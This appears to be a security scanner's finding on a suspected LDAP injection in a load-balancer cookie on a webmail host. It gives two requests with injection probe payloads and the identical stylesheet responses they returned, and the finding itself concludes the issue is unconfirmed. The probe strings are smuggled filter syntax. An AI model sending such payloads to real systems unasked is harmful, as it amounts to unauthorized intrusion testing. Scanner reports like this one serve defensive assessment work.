The payloads 57c7b07a51392553)(sn=* and 57c7b07a51392553)!(sn=* were each submitted in the BIGipServerCDPTPA-Web-Pool cookie. The scanner recorded the two responses as different, which would suggest that the input is being incorporated into a disjunctive LDAP query in an unsafe manner. The responses below are the same 52,245-byte stylesheet with the same ETag; the only differences are an extra Cache-Control: private header and a freshly issued JSESSIONID cookie in Response 1, and in both cases the load balancer overwrites the malformed persistence cookie with a normal value (2701164298.20480.0000). Nothing here involves an LDAP query; treat this finding as unconfirmed.

Request 1

GET /includes/webmail.416a.css?l=en-US&v=standard HTTP/1.1
Host: webmail.roadrunner.com
Connection: keep-alive
Referer: https://webmail.roadrunner.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerCDPTPA-Web-Pool=57c7b07a51392553)(sn=*; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=abcRBH_ux1UYd7BjUDr6s

Response 1

HTTP/1.1 200 OK
Server: Resin/3.0.21
Cache-Control: private
Cache-Control: max-age=604800
Expires: Mon, 14 Mar 2011 18:07:27 GMT
ETag: "A2Z+9fBVy59"
Last-Modified: Thu, 13 Jan 2011 16:46:41 GMT
Set-Cookie: JSESSIONID=abcuhaqltufy08YOjGr6s; path=/
Content-Type: text/css
Content-Length: 52245
Date: Mon, 07 Mar 2011 18:07:27 GMT
Set-Cookie: BIGipServerCDPTPA-Web-Pool=2701164298.20480.0000; path=/

@CHARSET "ISO-8859-1";

A:active, A:focus {outline:0;} /* Eliminates the border around active links in Firefox */
A:hover {text-decoration:none;}
A {text-decoration:none;}
A:active {color: #FAAD3E; text-decoration: none;}
SPAN.more {color:#FFFFFF;}

iframe { border: none;}

/* <-- HEADER WEBMAIL CSS CLASSES - START --> */
.siteSearch FORM LABEL.enhanced {float:left;margin-left:10px;background:url('/images/label_google.gif') 0px 0px no-repeat;width:63px;height:34px;display:block;margin-top:2px;font-size:0px;text-indent:-5000px;}

.header .content .tertiaryNav LI.username {
   float: left;
   margin: 3px 7px 0px 10px;
   font-size: 90%;
}

.header .content .tertiaryNav LI.signout {
   float: left;
   margin: 3px 7px 0px 10px;
   font-size: 90%;
   padding-left: 0px;
}

.leaderboardTop {
text-align: center;
background: #232428 url(/images/ad300x250_advertisement.gif) no-repeat scroll 50% 7px;
}

.leaderboardTop .border {
text-align: left;
vertical-align: top;
height: 100%;
max-height: 90px;
}

/* header div is 4 pixels wider to account for the shadows on the navigation menu */
.header .content .login {
   position: relative;
   width: 966px;
   height: 160px;
   overflow: hidden;
text-align:center;
}
/* <-- HEADER WEBMAIL CSS CLASSES - END --> */

.content {text-align: left;}

/* <-- ERROR CSS CLASSES - START --> */
.webmailErrorInfoSection {
position: relative;
padding: 2px 0px;
margin-top: 10px;
margin-bottom:5px;
}

.webmailError {
   background: url('/images/webmail_images/icon_sprite_16x16.gif') -252px 1px no-repeat;
   width: 19px;
   height: 14px;
}

.webmailInfo {
   background: url('/images/webmail_images/icon_sprite_16x16.gif') -303px 0px no-repeat;
   width: 17px;
   height: 16px;
}

.webmailErrorInf
...[SNIP]...

Request 2

GET /includes/webmail.416a.css?l=en-US&v=standard HTTP/1.1
Host: webmail.roadrunner.com
Connection: keep-alive
Referer: https://webmail.roadrunner.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerCDPTPA-Web-Pool=57c7b07a51392553)!(sn=*; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=abcRBH_ux1UYd7BjUDr6s

Response 2

HTTP/1.1 200 OK
Server: Resin/3.0.21
Cache-Control: max-age=604800
Expires: Mon, 14 Mar 2011 18:07:29 GMT
ETag: "A2Z+9fBVy59"
Last-Modified: Thu, 13 Jan 2011 16:46:41 GMT
Content-Type: text/css
Content-Length: 52245
Date: Mon, 07 Mar 2011 18:07:29 GMT
Set-Cookie: BIGipServerCDPTPA-Web-Pool=2701164298.20480.0000; path=/

@CHARSET "ISO-8859-1";

A:active, A:focus {outline:0;} /* Eliminates the border around active links in Firefox */
A:hover {text-decoration:none;}
A {text-decoration:none;}
A:active {color: #FAAD3E; text-decoration: none;}
SPAN.more {color:#FFFFFF;}

iframe { border: none;}

/* <-- HEADER WEBMAIL CSS CLASSES - START --> */
.siteSearch FORM LABEL.enhanced {float:left;margin-left:10px;background:url('/images/label_google.gif') 0px 0px no-repeat;width:63px;height:34px;display:block;margin-top:2px;font-size:0px;text-indent:-5000px;}

.header .content .tertiaryNav LI.username {
   float: left;
   margin: 3px 7px 0px 10px;
   font-size: 90%;
}

.header .content .tertiaryNav LI.signout {
   float: left;
   margin: 3px 7px 0px 10px;
   font-size: 90%;
   padding-left: 0px;
}

.leaderboardTop {
text-align: center;
background: #232428 url(/images/ad300x250_advertisement.gif) no-repeat scroll 50% 7px;
}

.leaderboardTop .border {
text-align: left;
vertical-align: top;
height: 100%;
max-height: 90px;
}

/* header div is 4 pixels wider to account for the shadows on the navigation menu */
.header .content .login {
   position: relative;
   width: 966px;
   height: 160px;
   overflow: hidden;
text-align:center;
}
/* <-- HEADER WEBMAIL CSS CLASSES - END --> */

.content {text-align: left;}

/* <-- ERROR CSS CLASSES - START --> */
.webmailErrorInfoSection {
position: relative;
padding: 2px 0px;
margin-top: 10px;
margin-bottom:5px;
}

.webmailError {
   background: url('/images/webmail_images/icon_sprite_16x16.gif') -252px 1px no-repeat;
   width: 19px;
   height: 14px;
}

.webmailInfo {
   background: url('/images/webmail_images/icon_sprite_16x16.gif') -303px 0px no-repeat;
   width: 17px;
   height: 16px;
}

.webmailErrorInfoTxt {
font-family: arial;
font-size: 12px;
font-weight: bold;
padding-left: 40px;
text-align: left;
}

/* <
...[SNIP]...
